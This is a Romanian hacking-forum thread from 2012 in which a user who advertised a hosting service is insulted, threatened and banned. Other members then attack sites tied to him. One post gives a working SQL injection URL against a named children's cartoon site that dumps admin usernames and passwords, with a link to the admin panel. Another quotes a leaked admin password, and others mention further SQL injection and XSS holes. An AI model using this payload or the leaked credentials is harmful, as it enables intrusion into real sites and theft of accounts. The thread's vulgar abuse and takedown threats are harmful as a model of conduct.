wayn3 Posted January 28, 2012 Report Posted January 28, 2012 (edited) // no spam. Edited January 28, 2012 by aelius Quote
wayn3 Posted January 28, 2012 Author Report Posted January 28, 2012 Ma cac pe asa numitul vostru forum , nu e logic ,ca din moment ce oamenii acceseaza cuvintele cheie de pe google gaseste si acest forum 'naspa' ?Greu cu gandirea, sariti repede la gatul omului, mai mult nu puteti, va cred.SFAT: tex, daca-ti place femeia lata-n cur, ia-ti o iapa.. Quote
aelius Posted January 28, 2012 Report Posted January 28, 2012 (edited) Ma cac pe asa numitul vostru forum , nu e logic ,ca din moment ce oamenii acceseaza cuvintele cheie de pe google gaseste si acest forum 'naspa' ?Greu cu gandirea, sariti repede la gatul omului, mai mult nu puteti, va cred.SFAT: tex, daca-ti place femeia lata-n cur, ia-ti o iapa..Ar fi bine sa-ti ceri scuze, pana nu-ti dau jos cu ratatul tau de site de hosting. Caca-te pe crucea lu ma-ta, labare.Ai venit aici, ti-ai facut reclama la hosting, nu a comentat nimeni nimic si te-ai intins precum mucii pe gard.Apoi intrii si ne spui ca te caci. Caca-te, caca-te-ai pietroaie, radacini si placi de azbociment.Esti analfabet, nesimtit si te caci in poteca. Sunt curios cum raspunzi clientilor tai, tot asa ? Sau le spui ca te caci pe site-urile lor?Ban permanent. Edited January 28, 2012 by aelius Quote
totti93 Posted January 28, 2012 Report Posted January 28, 2012 (edited) Ia ca mi-am pus amprenta aici:Desene animateAm cenzurat ca sa nu citeasca ceva urat copii mici.L.E.: De ce sa fiu sugaci? http://www.world-of-kids.in/vizionare.php?_Fara_Titlu_&ep=1&var=8/**/AND/**/FALSE/**/UNION/**/SELECT/**/NULL,NULL,CONCAT(0x3c68313e,nume,0x3a,parola,0x3c2f68313e),NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/adm--Admin Panel: http://www.world-of-kids.in/admin/ Edited January 28, 2012 by totti93 Quote
jojo123 Posted January 28, 2012 Report Posted January 28, 2012 Asta nu cripteaza parolele ?admin nuomaispargiacum Quote
mengele Posted January 28, 2012 Report Posted January 28, 2012 Ma cac pe asa numitul vostru forum , nu e logic ,ca din moment ce oamenii acceseaza cuvintele cheie de pe google gaseste si acest forum 'naspa' ?Greu cu gandirea, sariti repede la gatul omului, mai mult nu puteti, va cred.SFAT: tex, daca-ti place femeia lata-n cur, ia-ti o iapa..IntelHost Solutions - Inregistrare domeniiXSS on search dude wtf ... ceeace ai postat tu mai sus se numeste CULMEA TUPEULUI ...dupa ce ca esti prost...mai si semnalizezi... Quote
totti93 Posted January 28, 2012 Report Posted January 28, 2012 (edited) Hmmm... Si-a mai bagat cineva mana, sau wayn3 isi trage prezervative pe server?L.E.: Ehh da. Isi tragea [...] pe cap.Vulnerability: SQL InjectionSolution: Password ChangeCel mai penal... Si totusi trist... Edited January 28, 2012 by totti93 Quote
mengele Posted January 28, 2012 Report Posted January 28, 2012 Eu acum am vazut postul asta si am dat o geana pe site-ul ala... Quote
aelius Posted January 28, 2012 Report Posted January 28, 2012 hahaha, au si sarit "lupii" pe el ) Quote
mengele Posted January 28, 2012 Report Posted January 28, 2012 hahaha, au si sarit "lupii" pe el )sssst... Quote